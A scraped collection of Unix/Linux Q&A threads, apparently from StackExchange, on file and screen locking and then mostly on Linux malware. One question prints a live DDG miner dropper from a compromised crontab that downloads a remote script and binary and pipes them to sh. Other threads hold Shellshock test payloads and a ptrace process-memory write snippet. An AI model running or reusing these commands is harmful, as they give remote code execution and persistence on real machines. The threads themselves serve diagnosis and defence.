On the quick: file locking is normally only supported by higher level languages (as far as I know). For perl examples you can start here https://stackoverflow.com/questions/34920/how-do-i-lock-a-file-in-perl or any of the Perl classics like https://docstore.mik.ua/orelly/perl/cookbook/ch07_12.htm (beware SSL cert issues) or such like. For shell scripting you have to considerJdeBP's comment: why do you want to lock your file. Depending on your answer you could consider strategies like temporarily changing write permissions on the file, renaming the file and processing the renamed file before changing the file name back, working on a copy and rewriting the original afterwards.
I would like to lock a file, run some tests then unlock the file. How can I do this. I could use the command line, perl, or a shell script. The reason I would like to lock the file is occasionally when connecting with ftp to our Apache server we get an error upon deleting files: "Cannot open or remove a file containing a running program". I would like to test using an ftp move command instead of a delete command to see if I catch this error. I would like to test whether locking a file would cause this error.
How can I simulate locking a file?
You can simply use the package from sid (https://packages.debian.org/sid/vlock), it works fine.
I've set up a no-x/console only system running a minimal install of debian jessie/testing. For this system I need a screen locker to lock the entire session when I'm away. vlock would be appropriate but for some reason it's not in the jessie repo. Does anyone know why vlock isn't in the jessie repo? What can I use instead? FYI I'm using tmux.
Lock console session
This LINK to the lists.samba archive has a user with the same file locking issue. Essentially find the PID of the process and kill the process this should free the lock (sometimes) I have used this in the past and it has worked for me any time that I had a locked file. But, I am not using outlook. The next response in the thread has a [global] option setting for samba being suggested. You might try to set reset on zero vc = yes in your [global] section. EDIT: This is pretty good reading on samba locking. Chapter 17. File and Record Locking
My organisation uses Debian Linux running Samba for office file servers. Users run Outlook for their email, which crashes fairly regularly and leaves the outlook.pst file locked. Currently, our procedure for removing the lock (which allows the user to use Outlook again) is:Manually open a terminal session Go to the users dir holding the outlook.pst file Remove the ~outlook.pst.tmp file (or similar name) Rename the pst file (eg mv outlook.pst outlook.pstoff) Copy the file back to outlook.pst (ie cp outlook.pstoff outlook.pst) Remove the old file (ie rm outlook.pstoff) chown outlook.pst to the userThis could be scripted reasonably easier, but to be done properly it would need checking for available disk space before doing the copy. Is there some easier way to remove the lock on the file without copying it?
Is there a better way to unlock a file than move and copy?
You don't say which Desktop Environment you're using. There could be multiple places for these lock settings. Look for screensaver settings, there may be a lock screen/session option. It's not uncommon to have multiple screensaver applications installed so you may have to look at all of them to figure out which is active. Also look in the Power Manager settings. This is another place that there could be a lock setting under Display, Session, or Screen.
I run Linux Mint in a VM. Every single time I look at it, it has gone into some sort of "lock screen"-like state where it requires me to enter a password to get back. This is very annoying. How do I turn this off entirely so that it never "auto-locks"? I already looked through a bunch of a settings but found nothing. Also, I already tried this and it does NOT work! https://vitux.com/how-to-disable-enable-automatic-screen-lock-in-linux-mint-20-trough-cli/
How do I make Linux Mint stop pestering me for passwords all the time?
Probably this is not the perfect answer but is a workaround i wanted this to run: exec_always xautolock -time 1 -locker "i3lock && xset dpms force off"But it didn't. After reading a liitle bit the xautolock manual I tried this: exec_always xautolock -time 1 -locker "i3lock" -killtime 1 -killer "xset dpms force off"That didn't run also... So finnaly tried this: exec_always xautolock -time 1 -locker "xset dpms force off" -notify 5 -notifier "i3lock -n -c 0E1621"That seems to be working. See also if you want using xautolock and i3lock to lock/suspend after inactivity Hope that this may help you!
After recently switching to i3 in Arch, I need something to manage power. xautolock seemed to be a good choice. Unfortunately, I need it to do both systemctl suspend and i3lock at the same time, but it cannot achieve that. Eg. exec_always xautolock -time 3 -locker "i3lock && systemctl suspend"That does not work at all, after i3lock is triggered, suspend won't happen. Interesting though, the fact that this: bindsym $mod+Control+s exec --no-startup-id i3lock && systemctl suspendActually works, after pressing the binding, i3locks screen and system is suspended. Please let me know if xautolock can achieve the same thing, and what options will I need to add in order for it to work. Thank you for taking the time for a look! And just as a side note, exec_always xautolock -time 3 -locker “systemctl suspend” Works, but it only suspends machine and not lock it.
xautolock configuration in Arch i3
You can acquire partial lock using the the fcntl(2) system call by the F_SETLK, F_SETLKW, or F_GETLK command macros, and providing the partial area to be locked through a an flock structure provided as the third argument.F_SETLK, F_SETLKW, and F_GETLK are used to acquire, release, and test for the existence of record locks (also known as byte-range, file-segment, or file-region locks). The third argument, lock, is a pointer to a structure that has at least the following fields (in unspecified order). struct flock { ... short l_type; /* Type of lock: F_RDLCK, F_WRLCK, F_UNLCK */ short l_whence; /* How to interpret l_start: SEEK_SET, SEEK_CUR, SEEK_END */ off_t l_start; /* Starting offset for lock */ off_t l_len; /* Number of bytes to lock */ pid_t l_pid; /* PID of process blocking our lock (set by F_GETLK and F_OFD_GETLK) */ ... };The l_whence, l_start, and l_len fields of this structure specify the range of bytes we wish to lock. Bytes past the end of the file may be locked, but not bytes before the start of the file.
Linux and AFAIK most unixes expose the flock syscall for mandatory file-locking. My experience is admittedly limited with this, however am informed that it is kernel-enforced on the entire resource. But what if I wanted to only lock a part of a file mandatorily, such that read/writes to this resource are permitted, as long as they don't cross a particular boundary or stop reading once it reaches an outer bound of the locked region. Is this possible? Edit: Possible Implementation A possibility for advisory partial locking may be via MMaped regions, where the memory is mapped into each reader's address-space, on the condition that the requested region does not hold a lock. This would be implemented entirely in user-space, and thus loses the advantages of kernel-enforced locking, but would certainly work
Unix-esque partial-file-locking mechanism
This could be related to an issue with Xfce Power Manager. A sufficient workaround is to suspend via the logout menu in LXDE. The computer then wakes with no issues.
I have had Slackware 14.2 32bit installed on a netbook with LXDE as my main DE for about a month now. My main issue is that sometimes the screen is black on waking from sleep [suspend] and the only way to get back to the desktop is to REISUB or sometimes to do a hard reset. I thought the issue was with LXsession since I am running LXDE, so I updated LXsession to the latest version 0.5.3. However, this has had little effect on improvements. I have done experiments with Xfce, Fluxbox and Blackbox by enabling physlock and then waking, and I still have the same problem: the screen is black on unlock and the only way to get to the desktop is by rebooting. I have tried using the generic kernel instead of huge and it's the same issue. I don't think it's a hardware issue since the netbook was using Debian before and it didn't happen, so it must be something to do with whatever process controls waking from sleep/lock - but I don't know what that is. It could be a graphics issue [it uses Intel 945GME], but I don't think so, I think it's to do with the sleep process. Any help would be great since I am running out of ideas!
Slackware 14.2 - black screen after waking from sleep/lock - what process controls sleep/lock?
First, it's certainly possible to have viruses under Unix and Unix-like operating systems such as Linux. The inventor of the term computer virus, Fred Cohen, did his first experiments under 4.3BSD. A How-To document exists for writing Linux viruses, although it looks like it hasn't had an update since 2003. Second, source code for sh-script computer viruses has floated around for better than 20 years. See Tom Duff's 1988 paper, and Doug McIllroy's 1988 paper. More recently, a platform-independent LaTeX virus got developed for a conference. Runs on Windows and Linux and *BSD. Naturally, its effects are worse under Windows... Third, a handful of real, live computer viruses for (at least) Linux have appeared, although it's not clear if more than 2 or 3 of these (RST.a and RST.b) ever got found "in the wild". So, the real question is not Can Linux/Unix/BSD contract computer viruses? but rather, Given how large the Linux desktop and server population is, why doesn't that population have the kind of amazing plague of viruses that Windows attracts? I suspect that the reason has something to do with the mild protection given by traditional Unix user/group/other discretionary protections, and the fractured software base that Linux supports. I mean, my server still runs Slackware 12.1, but with a custom-compiled kernel and lots of re-compiled packages. My desktop runs Arch, which is a rolling release. Even though they both run "Linux", they don't have much in common. The state of viruses on linux may actually be the normal equilibrium. The situation on Windows might be the "dragon king", really unusual situation. The Windows API is insanely baroque, Win32, NT-native API, magic device names like LPT, CON, AUX that can work from any directory, the ACLs that nobody understands, the tradition of single-user, nay, single root user, machines, marking files executable by using part of the file name (.exe), all of this probably contributes to the state of malware on Windows.
Is it possible for my Linux box to become infected with a malware? I haven't heard of it happening to anyone I know, and I've heard quite a few times that it isn't possible. Is that true? If so, what's up with Linux Anti-Virus (security) software?
The myths about malware in Unix / Linux
It is a DDG mining botnet , how it work :exploiting an RCE vulnerability modifying the crontab downloading the appropriate mining program (written with go) starting the mining processDDG: A Mining Botnet Aiming at Database Servers SystemdMiner when a botnet borrows another botnet’s infrastructure U&L : How can I kill minerd malware on an AWS EC2 instance? (compromised server)
I wanted to add something to my root crontab file on my Raspberry Pi, and found an entry that seems suspicious to me, searching for parts of it on Google turned up nothing. Crontab entry: */15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | shThe contents of http://103.219.112.66:8000/i.sh are: export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinmkdir -p /var/spool/cron/crontabs echo "" > /var/spool/cron/root echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root cp -f /var/spool/cron/root /var/spool/cron/crontabs/rootcd /tmp touch /usr/local/bin/writeable && cd /usr/local/bin/ touch /usr/libexec/writeable && cd /usr/libexec/ touch /usr/bin/writeable && cd /usr/bin/ rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeableexport PATH=$PATH:$(pwd) ps auxf | grep -v grep | grep xribfa4 || rm -rf xribfa4 if [ ! -f "xribfa4" ]; then curl -fsSL -m1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -o xribfa4||wget -q -T1800 http://103.219.112.66:8000/static/4004/ddgs.$(uname -m) -O xribfa4 fi chmod +x xribfa4 /usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4ps auxf | grep -v grep | grep xribbcb | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep xribbcc | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep xribbcd | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep xribbce | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep xribfa0 | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep xribfa1 | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep xribfa2 | awk '{print $2}' | xargs kill -9 ps auxf | grep -v grep | grep xribfa3 | awk '{print $2}' | xargs kill -9echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" | crontab -My Linux knowledge is limited, but to me it seems that downloading binaries from an Indonesian server and running them as root regularly is not something that is usual. What is this? What should I do?
Suspicious crontab entry running 'xribfa4' every 15 minutes
Most normal users can send mail, execute system utilities, and create network sockets listening on higher ports. This means an attacker couldsend spam or phishing mails, exploit any system misconfiguration only visible from within the system (think private key files with permissive read permissions), setup a service to distribute arbitrary contents (e.g. porn torrent).What exactly this means depends on your setup. E.g. the attacker could send mail looking like it came from your company and abuse your servers mail reputation; even more so if mail authentication features like DKIM have been set up. This works till your server's rep is tainting and other mail servers start to blacklist the IP/domain. Either way, restoring from backup is the right choice.
After a recent break in on a machine running Linux, I found an executable file in the home folder of a user with a weak password. I have cleaned up what appears to be all the damage, but am preparing a full wipe to be sure. What can malware run by a NON-sudo or unprivileged user do? Is it just looking for files marked with world writable permission to infect? What threatening things can a non-admin user do on most Linux systems? Can you provide some examples of real world problems this kind of security breach can cause?
Can malware run by a user without admin or sudo privileges harm my system? [closed]
Those are TCP connections that were used to make an outgoing connection to a website. You can tell from the trailing :80 which is the port that's used for HTTP connections to web servers, typically. After the 3 way TCP connection handshake has completed the connections are left in a "wait to close" state. This bit is your local system's IP address and that's the port that was used to make the connection to the remote web server: IP: 192.168.0.100 PORT: 50161Example Here's output from my system using netstat -ant: tcp 0 0 192.168.1.20:54125 198.252.206.25:80 TIME_WAIT Notice the state at the end? It's TIME_WAIT. You can further convince yourself of this by adding the -p switch so we can see what process is bound/associated to this particular connection: $ sudo netstat -antp | grep 192.168.1.20:54125 $This shows that no process was affiliated with this.
This is what I see in Nethogs:I'm concerned about the listings with PID ?, running as root. How can I find out what these are? I'm running Linux Mint 14. Please let me know what other information I should include.
How to tell if mysterious programs in nethogs listing are malware?
Yes and no. Viruses/trojans are just programs, and will work on Wine... Also, your normal Linux file system is exposed to Wine with the user that launches Wine credentials. BUT, usually viruses are based on lots of hacks, and they expect a "standard" and common Windows installation. I doubt that any virus is coded thinking that it will be executed on Wine, and if it exists, it will probably not be too successful. Why? Because Wine users are a small portion of normal users, they have "weird" and strange installations (think in all flavours of Linux+Wine), usually are avanced users, and they have a strong community aware of security. So: yes, you are exposed to windows viruses, but not totally exposed, and most probably your linux installation will not be contaminated. Just be careful as you are on windows. On the other hand, you can use several techniques to increase the security: use chrooted wine (search google for chroot), virtualized environments, etc...
Just wondering if installing Wine might open up a fairly solid Linux desktop to the world of Windows viruses. Any confirmed reports about that? Would you then install a Windows antivirus product under Wine?
Does installing and using Wine open up your Linux platform to Windows viruses?
Look here: https://www.maketecheasier.com/more-gnome-shell-tips-and-tricks/ Scroll down to 6 "Screencast Recording". It says: Unknown to many, Gnome Shell has a built-in screen recorder. At any point of time, you just have to press the shortcut key “Shift + Ctrl + Alt + R” to activate the screen recorder. Once activated, you will see a recording button at the bottom right corner. Press “Shift + Ctrl + Alt + R” again to stop the recording. It will then save itself with the filename “shell-date-string-counter.webm” in your Home folder.
Some days ago that widget appeared on screen and I have no idea how to remove it and how did it came to my system. Not taken by screenshots. I suggest it is malware. Any ideas?
Which process places a red circle to the bottom right corner of my display on Linux Mint 18.1?
Fileless malware attacks the target by exploiting a vulnerability e.g. in a browser's Flash plugin, or in a network protocol. A Linux process can be modified by using the system call ptrace(). This system call is usually used by debuggers to inspect and manage the internal state of the target process, and is useful in software development. For instance, let's consider a process with PID 1234. This process' whole address space can be viewed in the pseudo filesystem /proc at the location /proc/1234/mem. You can open this pseudofile, then attach to this process via ptrace(); after doing so, you can use pread() and pwrite() to write to the process space. char file[64]; pid = 1234;sprintf(file, "/proc/%ld/mem", (long)pid); int fd = open(file, O_RDWR); ptrace(PTRACE_ATTACH, pid, 0, 0);waitpid(pid, NULL, 0); off_t addr = ...; // target process addresspread(fd, &value, sizeof(value), addr); // or pwrite(fd, &value, sizeof(value), addr);ptrace(PTRACE_DETACH, pid, 0, 0); close(fd);(Code taken from here. Another paper about a ptrace exploit is available here.) Concerning kernel-oriented defense against these attacks, the only way is to install kernel vendor patches and/or disabling the particular attack vector. For instance, in the case of ptrace you can load a ptrace-blocking module to the kernel which will disable that particular system call; clearly this also makes you unable to use ptrace for debugging.
I understand the definition of fileless malware:Malicious code that is not file based but exists in memory only… More particularly, fileless malicious code … appends itself to an active process in memory…Can somebody please explain how this appending itself to an active process in memory works ? Also, what (kernel) protection/hardening is available against such attacks ?
how does fileless malware work on linux?
I straced ls and got more information to dig (stripped non-important syscalls): open("empty_dir", O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC) = 3 getdents(3, /* 3 entries */, 32768) = 80 write(1, ".\n", 2.) = 2 write(1, "..\n", 3..) = 3Hmm, we see that syscall getdents works correctly and returned all 3 entries ('.','..' and '_---*'), but ls wrote only '.' and '..'. It means that we have some problem with wrapper around getdents which is used by coreutils. And coreutils use readdir glibc wrapper for getdents. Also to prove that there are no problems with getdents i tested little prog from example section of getdents' man page. This prog showed all files. Maybe we just found a bug at the glibc? So i updated glibc package to the last version in my distro but didn't get any good result. Also i didn't find any correlating information in bugzilla. So let's go deeper: # gdb ls (gdb) break readdir (gdb) run Breakpoint 1, 0x00007ffff7dfa820 in readdir () from /lib64/libncom.so.4.0.1 (gdb) info symbol readdir readdir in section .text of /lib64/libncom.so.4.0.1Wait, what? libncom.so.4.0.1? Not a libc? Yes, we just see a malicious shared library with libc functions for hiding malicious activity: # LD_PRELOAD=/lib64/libc.so.6 find / > good_find # find / > injected_find # diff good_find injected_find 10310d10305 < /lib64/libncom.so.4.0.1 73306d73300 < /usr/bin/_-config 73508d73501 < /usr/bin/_-pud 73714d73706 < /usr/bin/_-minerd 86854d86845 < /etc/ld.so.preloadRemoving rootkit files, checking all packages' files (rpm -Va in my case), auto-start scripts, preload/prelink configs, system files (find / + rpm -qf in my case), changing affected passwords, finding and killing rootkit's processes: # for i in /proc/[1-9]*; do name=$(</proc/${i##*/}/comm); ps -p ${i##*/} > /dev/null || echo $name; done _-minerdIn the end full system update, reboot and problem solved. Reason of the successful hacking: ipmi interface with very old firmware which suddenly was available from the public network.
I have a problem with removing empty dir, strace shows error: rmdir("empty_dir") = -1 ENOTEMPTY (Directory not empty)And ls -la empty_dir shows nothing. So i connected to the fs (ext4) with debugfs and see the hidden file inside this dir: # ls -lia empty_dir/ total 8 44574010 drwxr-xr-x 2 2686 2681 4096 Jan 13 17:59 . 44573990 drwxr-xr-x 3 2686 2681 4096 Jan 13 18:36 ..debugfs: ls empty_dir 44574010 (12) . 44573990 (316) .. 26808797 (3768) _-----------------------------------------------------------.jpg Why could this happen? And any chance to solve this problem without unmounting and full checking fs? Additional information: The "hidden" file is just a normal jpg file and can be opened by the image viewer: debugfs: dump empty_dir/_-----------------------------------------------------------.jpg /root/hidden_file# file /root/hidden_file /root/hidden_file: JPEG image data, JFIF standard 1.02rm -rf empty_dir is not working with the same error: unlinkat(AT_FDCWD, "empty_dir", AT_REMOVEDIR) = -1 ENOTEMPTY (Directory not empty)find empty_dir/ -inum 26808797 shows nothing.
rmdir failed to remove empty directory
At the end of day, after investigating the issue, the VMs doing mixed case DNS requests are OpenBSD machines running rebound, a DNS proxy used in OpenBSD. Moreover, it appears it is nowadays common practice rebound, Unbound, pydig and Tor making such mixed case queries as a security measure. Thus, the queries are not the result of malware in this case. From Use of Mixed Case DNS QueriesThese queries appear to be the result of DNS servers supporting a relatively new DNS security mechanism, "0x20 Bit encoding". The approach got its name from encoding a bit value using the case of letters. if bit 0x20 is set in a byte, the letter is lower case. If it is cleared, the letter is upper case. Host names are not case sensitive. However, the case is maintained. The answer will use the same mixed case as the query. As it turns out, almost all DNS servers follow this behaviour. The new part is that now some DNS servers start to deliberately encode a random value into each query they send, and then verify if the value is maintained in the response. This in effect adds additional bits to the query id. While this is clearly a "hack", it is a pretty attractive one. If your DNS server supports this feature, it will automatically gain a few more bits of "spoofing resistance". The DNS servers it connects to do not need to change anything. Unlike for DNSSEC, which is of course the real fix, but requires extensive work to configure,and has to be configured for each zone.From calomel - Unbound DNS TutorialWhat is dns-0x20 capitalization randomization ? Capitalization randomization is also called dns-0x20. This is an experimental resilience method which uses upper and lower case letters in the question hostname to obtain randomness. On average adding about 7 or 8 bits of entropy. This method currently has to be turned on by the dns admin manually, as it may result in maybe 0.4% of domains getting no answers due to no support on the authoritative server side. In our second example we enable the directive "use-caps-for-id: yes" for better security using dns-0x20. All this means is that calomel.org is the same as CaLOMeL.Org which is the same as CALOMEL.ORG. When Unbound sends a query to a remote server it sends the hostname string in random upper and lower characters. The remote server must resolve the hostname as if all the characters were lower case. The remote server must then send the query back to Unbound in the same random upper and lower characters that Unbound sent. If the characters of the hostname in the response are in the same format as the query then the dns-0x20 check is satisfied. Attackers hoping to poison a Unbound DNS cache must therefore guess the mixed-case encoding of the query and the timing of the return dns answer in addition to all other fields required in a DNS poisoning attack. dns-0x20 increases the difficulty of the attack significantly.Related question: Chrome: DNS requests with random DNS names: malware?
I am seeing some strange DNS queries. They have seemingly random mixed case coming from machines in my network. Is it possible I have malware? $ sudo tcpdump -n port 53 16:42:57.805038 192.168.5.134.47813 > 192.168.5.2.53: 27738+ A? Www.sApO.PT. (29) 16:42:57.826942 192.168.5.2.53 > 192.168.5.134.47813: 27738 1/0/0 A 213.13.146.142 (45) 16:43:02.813782 192.168.5.2.53 > 192.168.5.134.12193: 17076 1/0/0 A 213.13.146.142 (45) 16:43:06.232232 192.168.5.134.44055 > 192.168.5.2.53: 28471+ A? www.SaPo.pt. (29) 16:43:06.253887 192.168.5.2.53 > 192.168.5.134.44055: 28471 1/0/0 A 213.13.146.142 (45) 16:45:22.135751 192.168.5.134.11862 > 192.168.5.2.53: 48659+ A? wwW.cnn.COm. (29) 16:45:22.190254 192.168.5.2.53 > 192.168.5.134.11862: 48659 2/0/0 CNAME turner-tls.map.fastly.net., (84) 16:45:27.142154 192.168.5.134.34929 > 192.168.5.2.53: 25816+ A? wWw.cnN.com. (29) 16:45:27.168537 192.168.5.2.53 > 192.168.5.134.34929: 25816 2/0/0 CNAME turner-tls.map.fastly.net., (84) 16:45:32.150473 192.168.5.134.29932 > 192.168.5.2.53: 40674+ A? wWw.cnn.cOM. (29) 16:45:32.173422 192.168.5.2.53 > 192.168.5.134.29932: 40674 2/0/0 CNAME turner-tls.map.fastly.net., (84)
Mixed case DNS requests - Malware in my network?
BitcoinPlus is a web-based Bitcoin mining application written in Java. It uses your CPU to perform intensive calculations in an attempt to solve difficult math problems - this is part of the Bitcoin creation and security process. I've not heard of any *nix trojans or virii for Bitcoin generation (the only one I'm aware of is, ironically, MacOSX exclusive) but I have seen this site exploited to generate Bitcoins on public-access systems. It would be possible for a simple class of existing virii/trojans to launch this process hidden from view, so you may be dealing with a novel use for an old concept. You might try contacting BitcoinPlus to determine which user your communications are mapped to and perhaps determine the source of the problem - or at the very least get the exploiter's account locked/seized. If you need further Bitcoin-specific information or resources you could also ask at the Bitcoin StackExchange currently in public beta. Perhaps someone there knows something I don't.
I have a weird problem since about a week. When I wake up my computer from suspend, a java process starts and consumes about 170 % CPU capacity. I analyzed the java process a bit: it connects to static.icloud-ips.com. Here's a screenshot of what I found out: http://imageshack.us/photo/my-images/688/javavirus.png/ To solve this problem I deleted all files in ~/.java/deployment/cache/ but however, it seems like the file was recreated. Is this a virus? How can I solve this problem? I use Debian Wheezy x64 with Gnome 3.2
Java problem - nearly looks like a virus?
You have done it right. Your systems are secure and not vulnerable from this exploit. If your system would not be secure, the output of the command would be:vulnerable this is a testbut since your output is bash: warning: x: ignoring function definition attempt bash: error importing function definition for 'x' this is a test you are safe. If you did this yesterday, please consider running yum update bash today, too as the fix from yesterday is not as good as the one released today.EDIT (as OP requested more information) I can also calm you on the newer vulnerablility. Your system already has the new fix installed. If you'd had the outputecho vuln still vulnerable :(you'd be still vulnerable. Now I cannot give you answer to how the exploit exactly works, I mean by that that I cannot tell you what exactly happens and what the differences are between the first and the second exploit. But I can give you a simplified answer to how the expoit works. env X='() { (a)=>\' bash -c "echo echo vuln"; [[ "$(cat echo)" == "vuln" ]] && echo "still vulnerable :(" "Does nothing else" than saving a bit of executable code in an environmental variable that will be executed every time you start a bash-shell. And a bash-shell is started easily/often. Not only by yourself but also a lot of programs need a bash to fulfill theyr work. Like CGI for example. If you would like to have some deeper read about this exploit, here is a link to red hats security blog: https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
I am using Fedora 20 on two machines. Having read about the Shellshock vulnerability, just now at 1100ish UTC on September 26th 2014, in UK, after a yum update bash to protect against it, I tried this recommended testmodes: env x='() { :;}; echo vulnerable' bash -c "echo this is a test"and, in both user and su modes, got this result on one machine: bash: warning: x: ignoring function definition attempt bash: error importing function definition for 'x' this is a testOn the other I got simply: this is a test Please: have I succeeded on both machines, or should I worry?In response to @terdon's comment I got this result: [Harry@localhost]~% env X='() { (a)=>\' bash -c "echo echo vuln"; [[ "$(cat echo)" == "vuln" ]] && echo "still vulnerable :(" echo vuln cat: echo: No such file or directory [Harry@localhost]~%Not sure what it means, though.Just to make it clear, I am puzzled by the warning, and also the differences between the two machines. I have had another close look at the warning message. It might be that, on the machine without the error message, I entered the command with "copy and paste": on the other I typed it in and got the warning, and I now see that the warning quotes the final 'x' as `x' (note the "back tick"). That machine has an american keyboard that I cannot yet change to UK layout, but there is another question entirely. Pursuing this on the 'net this LinuxQuestions.org thread discusses it and it appears that both are safe.
Shellshock: Why this error when testing for vulnerability
I haven't watched the video, so I'm responding to the SU thread rather than the video it references. If an attacker can run code on your machine as your user, then they can log your key presses. Well, duh. All the applications you're running have access to your key presses. If you're typing stuff in your web browser, your web browser has access to your key presses. Ah, you say, but what about logging key presses in another application? As long as the other application is running on the same X server, they can still be logged. X11 doesn't attempt to isolate applications —that's not its job. X11 allows programs to define global shortcuts, which is useful for input methods, to define macros, etc. If the attacker can run code as your user, he can also read and modify your files, and cause all kinds of other harm. This is not a threat. It's part of the normal expectations of a working system. If you allow an attacker to run code on your machine, your machine isn't safe anymore. It's like if you open your front door and allow an axe murderer in: if you then get cleaved in two, it's not because your front door is insecure. SELinux is irrelevant here. SELinux attempts to contain unauthorized behavior, but after the initial exploit (which is not within SELinux's domain), everything is authorized behavior. The keylogger can only log keys pressed by the infected user. (At least as long as the infected user doesn't type the sudo password.)
ERROR: type should be string, got "\nhttps://superuser.com/questions/301646/linux-keylogger-without-root-or-sudo-is-it-real\nOr it's long gone as most of the new distros implement SELinux by default \n"
Does this threat still exist: Linux keylogger without root privileges
The point is that it may be not so easy to an inexperienced user to check source code. However, with the natural counterpoints, it could also be argued Arch Linux is not the best suited Linux distribution for inexperienced users. The Arch wiki(s), AUR helpers and most forums online warn about the dangers of such repositories/AUR, and that they must not be blindly trusted. Some helpers also warn you should read PKGBUILDs before installing them. As a recommendation, it is always advised to use trizen or aurman (or similar utilities) instead of yaourt (listed as problematic/discontinued), as they offers the user the opportunity to inspect packages/diff listings. It also helps looking at the history of contributions when picking up or updating packages. Casual users should not then use these repositories as their main staple of source of packages when you have official binary packages as an alternative. If you have to use AUR, you can search Arch forums and/or mailing lists for reports of problems. However, while it is an overly optimist view, it seems the Arch community regularly inspects packages, as was the case here. You can also try to use maldetectto search downloaded source code for known malware signatures, in downloaded source code, however the probabiliy of catching something with custom made code is nil. maldetect is often more suited for catching malware in PHP code. P.S. In my last job, I used for a short while dhcpd packages compiled from source, and was using for years FreeRadius packages compiled from source (because the Debian version was obsolete). In the 1st case I did some cursory check of the source code from github for the couple of times I downloaded it. In the 2nd case, I followed actively the FreeRadius user forum, github forum, and code updates. I also had a testing/quarantine environment. (I even managed to submit an important bug report found in my testing environment). Getting to the point, if you are doing any serious work with source installed packages, it usually involves much more work than official compiled packages offered by the distribution. P.S.2. Usually any seasoned Unix admin will tell you running directly scripts/source code directly sourced from curl without any kind of visual inspection, is a very bad idea from the security point of view.
Malicious code has been found and deleted later from 3 AUR packages acroread, blaz and minergate (e,g: acroread PKGBUILD detail). It was found in a commit released by a malicious user by changing the owner of the orphaned AUR package and including a malicious curl command. The curl command will download the main bash script x then the second script u (u.sh) in order to create a systemd service and using a function to collect some system data (non sensitive data) but the scripts can be modified by the attacker to be uploaded sequentially. In practice not all users have the ability to check the PKGBUILD before building any package on their systems for some reasons (require some knowledge , take more time etc...). To understand how it work I have downloaded and uploaded the 2 bash scripts on this pastbin page. What is the easiest way to check an AUR package for malicious code? naked security : Another Linux community with malware woes Malicious Software Packages Found On Arch Linux User Repository
How to check an AUR package for malicious code?
Out of curiosity I found this, were they discuss the analysis of a malware attack. http://remchp.com/blog/?p=52 About fake and fuck, often attackers load up tools to facilitate their work. About fake.cfg, there is indeed an util in Linux called fake. $apt-cache search fake | grep ^fake fake - IP address takeover tool Fake is a utility that enables the IP address be taken over by bringing up a second interface on the host machine and using gratuitous arp. Designed to switch in backup servers on a LAN.So I do suspect fake could be a way of: - evading firewall rules; - reaching to other networks; - generating packets/spam using multiple IPs of your network at a time to evade blacklists/fail2ban/apache mod evasive when attacking other servers in the Internet at large. As for fuck, the objectives are less clear. I found this: https://github.com/nvbn/thefuckMagnificent app which corrects your previous console command.The fuck command uses rules substitution to run the previous command with modifications. I am supposing here that it is used as a basic tool to automate/obfuscate in history/monitoring some of the actual commands run by the attackers. In addition to debuggers that others already mentioned, to follow up their activity, I do recommend using strace, sysdig or dtrace4linux. They are fantastic tools to follow up the nitty gritty of kernel calls. For following up all files opened in the compromised I/O, you run: sysdig -p "%12user.name %6proc.pid %12proc.name %3fd.num %fd.typechar %fd.name" evt.type=openSnoop file opens as they occur (with sysdig)From: http://www.sysdig.org/wiki/sysdig-examples/ Sysdig has the ability to show everything, including buffers of files being written, or data sent over the network. Needless to say, you should backup and isolate the server before running those commands.
I am not asking what to do with an compromised box. Specifically, I am asking if anybody has experience with hack/malware amongst other files leaves files "/usr/bin/fake.cfg" and "/usr/bin/fuck". I can see in part what it is doing and how. I realize the most appropriate course of action is to disconnect from internet, salvage, rebuild. I am curious to learn more about this particular incursion. I do not often get hacked or find myself on compromised machines - that I have this opportunity I would like to turn it into a learning opportunity. Does anybody have and experience with this particular incursion? Any suggestions where I might look. A million years ago the FBI used to keep a useful database of this sort of thing. Since 911 it has become pretty useless. Ideas?
Compromised server with malware "/usr/bin/fuck" and "/usr/bin/fake.cfg"
With default settings, software in a Windows 7 guest would not be able to access the keyboard input from outside of Virtualbox such as the host or another running guest. Access to the host OS resources would have to be permitted explicitly in some way to permit the guest control. However, human error can always sabotage the implicit security controls. Consider typing while the guest is being granted access by accident, like while you think you are typing into the host but the guest retained or attained control back. This can happen by a non-observant user or inadequate UI cues as to the state of the current environment. E.g. Control of the input resources could be handed to VM by an inadvertent hotkey trigger and the user not noticing. If Virtualbox Extensions have been installed, this could also occur by bumping the mouse or brushing the touchpad with focus-follows-mouse active. However, once you move beyond the default settings, there are many potential gotchas that would compromise your host's security or a user's privacy by way of indirect keyboard input capture. For example:depending on how the guest network has been setup, it could be possible to sniff network traffic for traffic visited by the host, thereby indirectly reading what you typed in Firefox's address bar. if shared clipboard access has been enabled, the guest could read all information you copy to the host's clipboard.If the question were expanded to outside the domain of just guest keylogger access, there are a myriad of security issues that should be accounted for based on what resources you share.
So, I have installed Windows 7 in Oracle's VirtualBox (5.0.8) and I would like to know if the Windows 7 software (including viruses and malware) is able in the default VirtualBox settings access the keyboard input outside of the VirtualBox. I mean, if, for example, a keylogger inside my Windows 7 VM is able to catch the keypresses in the Firefox installed on my default Xubuntu installation (host OS) that is running/hosting the VirtualBox.
Oracle's VirtualBox and keyloggers
